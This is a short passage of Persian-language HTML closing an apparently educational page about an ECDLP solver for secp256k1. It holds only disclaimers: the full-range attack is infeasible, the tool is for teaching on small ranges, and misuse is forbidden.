      <li>ECDLP روی secp256k1 با بازهٔ کامل مرتبهٔ گروه غیرعملی است؛ این ابزار صرفاً برای آموزش در بازه‌های کوچک است.</li>
      <li>استفادهٔ غیرمجاز/غیراخلاقی ممنوع است. این کد هیچ‌گاه توانایی شکستن کلیدهای واقعی را ندارد.</li>
    </ul>
  </div>
</body>
</html>
